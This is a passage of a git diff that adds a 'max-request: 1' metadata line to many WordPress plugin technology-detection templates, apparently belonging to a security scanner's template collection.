 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
